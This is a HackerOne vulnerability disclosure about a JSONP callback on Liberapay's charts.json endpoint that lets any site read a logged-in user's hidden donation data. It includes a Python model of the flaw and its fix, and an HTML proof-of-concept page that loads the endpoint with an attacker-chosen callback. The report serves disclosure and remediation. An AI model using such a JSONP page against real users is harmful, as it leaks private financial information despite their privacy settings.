HackerOne report H1:361951 by kapytein, dated June 5, 2018 (hackerone.com)

Liberapay: Exploiting JSONP callback on /username/charts.json endpoint leads to information disclosure despite user's privacy settings


Hello!

Vulnerability Details

The /username/charts.json endpoint can return a JSONP response because the simplate charts.json.spt renders its JSON through jsonp_dump, so any request that carries a ?callback= parameter gets the data wrapped in a JavaScript function call. What the endpoint returns depends on who is authenticated: if the user has enabled the privacy setting that hides their receiving-donation data, the endpoint returns a 403 unless the requester is that user (or an admin).

This happens here:

if participant.hide_receiving:
    if user != participant and not user.is_admin:
        raise response.error(403)

The vulnerable code is here:

[---] application/json via jsonp_dump

Basically, a jsonp_dump is unnecessary in this case (I did not notice a case where cross-domain requests need to be done), and it should be replaced with json_dump instead.

How could this be exploited?

This allows any site to load the endpoint in a <script> tag with a callback parameter of its choosing. The victim's browser attaches their liberapay.com session cookie to that cross-origin script request, so the 403 check passes as if the user had requested their own data, and the JSONP wrapper hands the receiving-donation data to the attacker's callback function, despite the user's privacy settings. This leads to unwanted information disclosure.
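The following is an added illustration (not Liberapay's code and not part of the original report) of why the choice between jsonp_dump and json_dump decides whether the hide_receiving check protects anything. It models the endpoint with a constructed Participant class, constructed sample chart rows, and an assumed jsonp_dump that wraps the JSON in `callback(...)`; the `attacker_observes` helper models what a third-party page can read when it loads the response through a <script> tag.

```python
import json
import re


class Forbidden(Exception):
    """Stands in for Aspen's response.error(403)."""


class Participant:
    """Constructed stand-in for a Liberapay participant record (not the project's model)."""

    def __init__(self, username, hide_receiving=False, is_admin=False):
        self.username = username
        self.hide_receiving = hide_receiving
        self.is_admin = is_admin


# Constructed sample rows (month, amount received). Not real Liberapay data.
CHARTS = {"bob": [["2018-04-01", "12.00"], ["2018-05-01", "30.50"]]}

CALLBACK_RE = re.compile(r"[A-Za-z_$][\w$]*")


def jsonp_dump(data, callback=None):
    """Assumed behaviour of a JSONP renderer: with a callback, wrap the JSON in a
    JavaScript call so that a cross-origin <script> tag can hand it to the caller."""
    body = json.dumps(data)
    if callback is None:
        return "application/json", body
    if not CALLBACK_RE.fullmatch(callback):
        raise ValueError("bad callback name")
    return "application/javascript", f"{callback}({body});"


def json_dump(data, callback=None):
    """The fix: plain JSON; the callback parameter is ignored."""
    return "application/json", json.dumps(data)


def charts_endpoint(participant, user, callback, dump):
    """Model of /username/charts.json: the authorization check quoted in the
    report, followed by whichever renderer the simplate uses."""
    if participant.hide_receiving:
        if user != participant and not user.is_admin:
            raise Forbidden()
    return dump(CHARTS.get(participant.username, []), callback)


def attacker_observes(content_type, body):
    """What a third-party page loading the response via <script src=...> can read.
    The browser executes the body as JavaScript: a callback invocation delivers
    the data to the attacker's function; a bare JSON array is only an expression
    statement whose value nobody can read."""
    m = re.fullmatch(r"(\w+)\((.*)\);", body, re.S)
    if content_type == "application/javascript" and m:
        return json.loads(m.group(2))
    return None


def scenarios():
    """Run the three cases that matter for this report and return what leaks."""
    bob = Participant("bob", hide_receiving=True)
    anon = Participant("")  # not logged in
    out = {}

    # 1. Victim is logged in as bob and visits the attacker's page. The browser
    #    attaches bob's session cookie, so the 403 check passes and JSONP hands
    #    the rows to the attacker's callback.
    ct, body = charts_endpoint(bob, bob, "rip", jsonp_dump)
    out["jsonp_logged_in"] = attacker_observes(ct, body)

    # 2. Same request with json_dump: the check still passes, but the response
    #    is plain JSON that a <script> tag cannot turn into attacker-readable data.
    ct, body = charts_endpoint(bob, bob, "rip", json_dump)
    out["json_logged_in"] = attacker_observes(ct, body)

    # 3. Without a session the privacy setting holds even with JSONP: 403.
    try:
        charts_endpoint(bob, anon, "rip", jsonp_dump)
        out["jsonp_anonymous"] = "leaked"
    except Forbidden:
        out["jsonp_anonymous"] = "403"
    return out


if __name__ == "__main__":
    for name, result in scenarios().items():
        print(f"{name}: {result}")
```

The point the model makes explicit: the authorization check is correct on its own, and the attacker never defeats it. The leak happens because the victim's browser satisfies the check for the attacker, and JSONP then delivers the result somewhere the same-origin policy would otherwise keep it from going. Dropping the callback wrapper (json_dump) closes the channel without touching the check.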

Proof of Concept

<!-- Attacker-controlled page. The callback name is chosen by the attacker and
     receives whatever the endpoint returns. -->
<script>
function rip(a) {
    // a is the JSON array returned by charts.json; a[1] is one of its rows
    alert(JSON.stringify(a[1]));
}
</script>
<!-- The browser sends the victim's liberapay.com session cookie with this
     cross-origin script request, so the hide_receiving check does not block it. -->
<script src="https://liberapay.com/~153779/charts.json?callback=rip"></script>

Host this file and visit it while authenticated to Liberapay: it will alert one row (index 1) of the returned JSON array. If you have not received any donations through Liberapay so far, an empty JSON array will be returned.

Impact

Any third-party site visited by a logged-in Liberapay user can read that user's receiving-donation data, because the browser's session cookie satisfies the authorization check and the JSONP callback carries the result across origins. The hide_receiving privacy setting is therefore bypassed, leading to unwanted information disclosure.